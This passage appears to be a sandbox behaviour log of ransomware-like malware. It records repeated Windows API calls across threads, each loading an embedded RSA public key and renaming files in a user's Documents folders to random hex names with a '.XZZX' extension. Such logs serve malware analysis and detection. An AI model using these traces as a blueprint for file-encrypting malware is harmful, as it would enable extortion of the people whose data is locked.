param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\A216BEA01542C25C94FD01F0195AA6A4.XZZX") returned 118 [0233.882] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0233.882] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\D61D4BD03E4836102A71062E41231A58.XZZX") returned 118 [0233.882] StrStrW (lpFirst="A216BEA01542C25C94FD01F0195AA6A4.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 908 os_tid = 0x1138 [0234.037] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.038] lstrcpyW (in: lpString1=0x2daf460, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0234.038] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0234.038] SetErrorMode (uMode=0x1) returned 0x1 [0234.038] lstrcpyW (in: lpString1=0x2daf860, lpString2="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" | out: lpString1="E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned="E47D77FB28AD6F18CEB95D752CDA5360.XZZX" [0234.038] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xaa120cbc, Data2=0x902f, Data3=0x4a47, Data4=([0]=0x95, [1]=0xb0, [2]=0x64, [3]=0x75, [4]=0xdf, [5]=0x59, [6]=0xf8, [7]=0xbc))) returned 0x0 [0234.038] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E47D77FB28AD6F18CEB95D752CDA5360.XZZX") returned 118 [0234.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.038] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\607A168429D59309AA120CBC2CB07751.XZZX") returned 118 [0234.038] StrStrW (lpFirst="E47D77FB28AD6F18CEB95D752CDA5360.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 909 os_tid = 0x113c [0234.193] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.193] lstrcpyW (in: lpString1=0x2daf460, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0234.193] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\" [0234.193] SetErrorMode (uMode=0x1) returned 0x1 [0234.194] lstrcpyW (in: lpString1=0x2daf860, lpString2="E85C7261086E23DEDFC379D70C9B0826.XZZX" | out: lpString1="E85C7261086E23DEDFC379D70C9B0826.XZZX") returned="E85C7261086E23DEDFC379D70C9B0826.XZZX" [0234.194] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0xe5b86d3d, Data2=0x4349, Data3=0x42af, Data4=([0]=0x9b, [1]=0x48, [2]=0x5c, [3]=0x92, [4]=0x6e, [5]=0x1a, [6]=0x4d, [7]=0xa))) returned 0x0 [0234.194] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\E85C7261086E23DEDFC379D70C9B0826.XZZX") returned 118 [0234.194] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.194] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\IkpxUp8UshIgHl1\\C62E1D651186D0E7E5B86D3D1461B52F.XZZX") returned 118 [0234.194] StrStrW (lpFirst="E85C7261086E23DEDFC379D70C9B0826.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 910 os_tid = 0x1140 [0234.353] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.353] lstrcpyW (in: lpString1=0x2daf460, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0234.353] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.353] SetErrorMode (uMode=0x1) returned 0x1 [0234.353] lstrcpyW (in: lpString1=0x2daf860, lpString2="0FE24CF432281F2497377D743655036C.XZZX" | out: lpString1="0FE24CF432281F2497377D743655036C.XZZX") returned="0FE24CF432281F2497377D743655036C.XZZX" [0234.353] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x2ac599a1, Data2=0xfca6, Data3=0x4dbd, Data4=([0]=0xb6, [1]=0x1c, [2]=0x6b, [3]=0xfd, [4]=0x4b, [5]=0xa5, [6]=0xcc, [7]=0x98))) returned 0x0 [0234.353] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\0FE24CF432281F2497377D743655036C.XZZX") returned 118 [0234.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.353] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\3F5C1A664CB8748E2AC599A14F9358D6.XZZX") returned 118 [0234.353] StrStrW (lpFirst="0FE24CF432281F2497377D743655036C.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 911 os_tid = 0x1144 [0234.505] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.505] lstrcpyW (in: lpString1=0x2daf460, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0234.505] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.505] SetErrorMode (uMode=0x1) returned 0x1 [0234.505] lstrcpyW (in: lpString1=0x2daf860, lpString2="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" | out: lpString1="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX" [0234.506] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x9c07afa0, Data2=0x41a9, Data3=0x473f, Data4=([0]=0xaf, [1]=0x56, [2]=0x1c, [3]=0x24, [4]=0x30, [5]=0xcd, [6]=0x8a, [7]=0x83))) returned 0x0 [0234.506] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX") returned 118 [0234.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.506] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F4AA90A0124607979C07AFA01520EBDF.XZZX") returned 118 [0234.506] StrStrW (lpFirst="4CDE900F0BC30BB32AB81EE70FDAEFFB.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 912 os_tid = 0x1148 [0234.661] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.661] lstrcpyW (in: lpString1=0x2daf460, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0234.661] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.661] SetErrorMode (uMode=0x1) returned 0x1 [0234.661] lstrcpyW (in: lpString1=0x2daf860, lpString2="5154BE9C1011AFD27B96A6C6143E941A.XZZX" | out: lpString1="5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned="5154BE9C1011AFD27B96A6C6143E941A.XZZX" [0234.661] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x639469ff, Data2=0x40c3, Data3=0x4efc, Data4=([0]=0xa5, [1]=0xdf, [2]=0x4b, [3]=0x43, [4]=0xf0, [5]=0x7d, [6]=0x0, [7]=0x88))) returned 0x0 [0234.661] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\5154BE9C1011AFD27B96A6C6143E941A.XZZX") returned 118 [0234.661] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.661] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\F48C7D3D13FB29F4639469FF16D60E3C.XZZX") returned 118 [0234.661] StrStrW (lpFirst="5154BE9C1011AFD27B96A6C6143E941A.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 913 os_tid = 0x114c [0234.817] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.817] lstrcpyW (in: lpString1=0x2daf460, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0234.817] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.817] SetErrorMode (uMode=0x1) returned 0x1 [0234.817] lstrcpyW (in: lpString1=0x2daf860, lpString2="632A4073379A2FDC09389DEB3BC71424.XZZX" | out: lpString1="632A4073379A2FDC09389DEB3BC71424.XZZX") returned="632A4073379A2FDC09389DEB3BC71424.XZZX" [0234.817] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x57c1223d, Data2=0xd35b, Data3=0x4840, Data4=([0]=0xa5, [1]=0x5d, [2]=0x21, [3]=0xbe, [4]=0x82, [5]=0xb0, [6]=0xe2, [7]=0x86))) returned 0x0 [0234.817] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\632A4073379A2FDC09389DEB3BC71424.XZZX") returned 118 [0234.817] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.817] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\60DF72AF3BA66EC057C1223D3E815308.XZZX") returned 118 [0234.817] StrStrW (lpFirst="632A4073379A2FDC09389DEB3BC71424.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 914 os_tid = 0x1150 [0234.974] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0234.974] lstrcpyW (in: lpString1=0x2daf460, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0234.974] lstrcpyW (in: lpString1=0x2dae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\" [0234.974] SetErrorMode (uMode=0x1) returned 0x1 [0234.974] lstrcpyW (in: lpString1=0x2daf860, lpString2="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" | out: lpString1="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX" [0234.974] CoCreateGuid (in: pguid=0x2dae440 | out: pguid=0x2dae440*(Data1=0x10aac1c8, Data2=0xa529, Data3=0x4820, Data4=([0]=0x97, [1]=0xbb, [2]=0x47, [3]=0xee, [4]=0x5b, [5]=0x2, [6]=0x44, [7]=0xd1))) returned 0x0 [0234.974] wsprintfW (in: param_1=0x2daec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\6B01EA683DC5F7920A3C155C41DDDBDA.XZZX") returned 118 [0234.974] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2dafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0234.974] wsprintfW (in: param_1=0x2dae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\lhhNd9leW5xmlXw00JFa\\ZW28zqHzfxAY2NV\\BA3EF1082E882D2010AAC1C831631168.XZZX") returned 118 [0234.974] StrStrW (lpFirst="6B01EA683DC5F7920A3C155C41DDDBDA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 915 os_tid = 0x1154 [0235.131] lstrcpyA (in: lpString1=0x2dafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 